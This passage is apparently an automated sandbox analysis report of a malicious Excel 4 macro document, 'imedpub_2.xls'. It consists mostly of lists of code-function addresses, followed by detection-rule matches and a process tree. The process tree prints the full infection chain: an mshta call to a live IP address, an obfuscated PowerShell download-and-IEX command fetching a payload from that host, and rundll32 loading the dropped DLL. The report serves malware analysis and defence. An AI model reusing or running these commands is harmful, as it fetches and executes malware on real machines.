                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026205111_2_00262051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0028005611_2_00280056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002670B311_2_002670B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002720BA11_2_002720BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026F09B11_2_0026F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027411611_2_00274116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002681B711_2_002681B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002651BB11_2_002651BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026225111_2_00262251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A2E811_2_0027A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026B2C711_2_0026B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E2CC11_2_0026E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026536111_2_00265361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026434611_2_00264346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002813AD11_2_002813AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027C3A011_2_0027C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027D38911_2_0027D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027E39511_2_0027E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027F43511_2_0027F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027044F11_2_0027044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002664E211_2_002664E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027851911_2_00278519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026554811_2_00265548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027255011_2_00272550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026A55F11_2_0026A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002795FA11_2_002795FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026E5CF11_2_0026E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027C63111_2_0027C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027860611_2_00278606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027A66611_2_0027A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002766CA11_2_002766CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026D6D811_2_0026D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026773511_2_00267735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027473C11_2_0027473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026971411_2_00269714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027176B11_2_0027176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026B74D11_2_0026B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026481611_2_00264816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027188911_2_00271889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026896911_2_00268969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027894B11_2_0027894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002809B511_2_002809B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002659F211_2_002659F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AA3011_2_0027AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00261A5611_2_00261A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026EA9911_2_0026EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BB2311_2_0027BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00268B3D11_2_00268B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00270B1911_2_00270B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026BB7E11_2_0026BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027CB5B11_2_0027CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277BA611_2_00277BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00274B8711_2_00274B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00269B8311_2_00269B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00278BE311_2_00278BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DBEA11_2_0027DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279BCF11_2_00279BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00262BD911_2_00262BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00267C3711_2_00267C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263C3C11_2_00263C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AC3A11_2_0027AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280C1411_2_00280C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276C4911_2_00276C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00264C5D11_2_00264C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DCF711_2_0027DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00275CC411_2_00275CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00266D2411_2_00266D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00276DF811_2_00276DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00269DCF11_2_00269DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00277DD511_2_00277DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027BE2711_2_0027BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280E3A11_2_00280E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263E3F11_2_00263E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265E6011_2_00265E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027AE6D11_2_0027AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00270E5311_2_00270E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026EE8111_2_0026EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00264EE311_2_00264EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00279EEC11_2_00279EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026AEFB11_2_0026AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0027DEDC11_2_0027DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00280F3311_2_00280F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026CF4711_2_0026CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00267FF211_2_00267FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026DFF311_2_0026DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353C3C12_2_00353C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035901112_2_00359011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036044F12_2_0036044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003620BA12_2_003620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F8FD12_2_0035F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035D6D812_2_0035D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036473C12_2_0036473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036411612_2_00364116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003713AD12_2_003713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AB8712_2_0035AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357FF212_2_00357FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003559F212_2_003559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003695FA12_2_003695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00357C3712_2_00357C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036F43512_2_0036F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AA3012_2_0036AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C63112_2_0036C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00353E3F12_2_00353E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AC3A12_2_0036AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370E3A12_2_00370E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BE2712_2_0036BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370C1412_2_00370C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035481612_2_00354816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036860612_2_00368606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036000112_2_00360001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036907F12_2_0036907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A66612_2_0036A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00355E6012_2_00355E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036AE6D12_2_0036AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0037005612_2_00370056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00351A5612_2_00351A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035205112_2_00352051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035225112_2_00352251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360E5312_2_00360E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354C5D12_2_00354C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366C4912_2_00366C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003570B312_2_003570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EA9912_2_0035EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035F09B12_2_0035F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035EE8112_2_0035EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036188912_2_00361889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DCF712_2_0036DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035AEFB12_2_0035AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00354EE312_2_00354EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003564E212_2_003564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369EEC12_2_00369EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036A2E812_2_0036A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DEDC12_2_0036DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B2C712_2_0035B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00365CC412_2_00365CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E2CC12_2_0035E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003666CA12_2_003666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035773512_2_00357735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00370F3312_2_00370F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00358B3D12_2_00358B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00356D2412_2_00356D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036BB2312_2_0036BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035971412_2_00359714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036851912_2_00368519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00360B1912_2_00360B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035BB7E12_2_0035BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035536112_2_00355361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035896912_2_00358969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036176B12_2_0036176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036255012_2_00362550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035A55F12_2_0035A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036CB5B12_2_0036CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035CF4712_2_0035CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035434612_2_00354346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035B74D12_2_0035B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035554812_2_00355548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036894B12_2_0036894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003709B512_2_003709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003581B712_2_003581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003551BB12_2_003551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367BA612_2_00367BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036C3A012_2_0036C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036E39512_2_0036E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E99112_2_0035E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00364B8712_2_00364B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359B8312_2_00359B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036D38912_2_0036D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035DFF312_2_0035DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00366DF812_2_00366DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00368BE312_2_00368BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0036DBEA12_2_0036DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00367DD512_2_00367DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00352BD912_2_00352BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00369BCF12_2_00369BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00359DCF12_2_00359DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E5CF12_2_0035E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024F8FD14_2_0024F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024AB8714_2_0024AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024E99114_2_0024E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025BE2714_2_0025BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025F43514_2_0025F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00247C3714_2_00247C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025C63114_2_0025C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AA3014_2_0025AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00243C3C14_2_00243C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00243E3F14_2_00243E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260E3A14_2_00260E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AC3A14_2_0025AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025860614_2_00258606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025000114_2_00250001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024481614_2_00244816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260C1414_2_00260C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024901114_2_00249011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025A66614_2_0025A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00245E6014_2_00245E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AE6D14_2_0025AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025907F14_2_0025907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025044F14_2_0025044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00256C4914_2_00256C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026005614_2_00260056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00241A5614_2_00241A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024205114_2_00242051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024225114_2_00242251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00250E5314_2_00250E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00244C5D14_2_00244C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002470B314_2_002470B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002520BA14_2_002520BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024EE8114_2_0024EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025188914_2_00251889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024EA9914_2_0024EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024F09B14_2_0024F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002464E214_2_002464E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00244EE314_2_00244EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00259EEC14_2_00259EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025A2E814_2_0025A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DCF714_2_0025DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024AEFB14_2_0024AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00255CC414_2_00255CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024B2C714_2_0024B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024E2CC14_2_0024E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002566CA14_2_002566CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DEDC14_2_0025DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024D6D814_2_0024D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00246D2414_2_00246D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025BB2314_2_0025BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024773514_2_00247735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260F3314_2_00260F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025473C14_2_0025473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00248B3D14_2_00248B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024971414_2_00249714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025411614_2_00254116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025851914_2_00258519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00250B1914_2_00250B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024536114_2_00245361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024896914_2_00248969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025176B14_2_0025176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024BB7E14_2_0024BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024434614_2_00244346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0024CF4714_2_0024CF47
                            Source: 48F2.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: imedpub_2.xlsMacro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0035E249 DeleteService,12_2_0035E249
                            Source: imedpub_2.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: imedpub_2.xls, type: SAMPLEMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: imedpub_2.xlsOLE indicator, VBA macros: true
                            Source: imedpub_2.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@3/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: imedpub_2.xlsOLE indicator, Workbook stream: true
                            Source: imedpub_2.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: imedpub_2.xlsReversingLabs: Detection: 27%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: PS C:\Users\Albus\Documents>
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
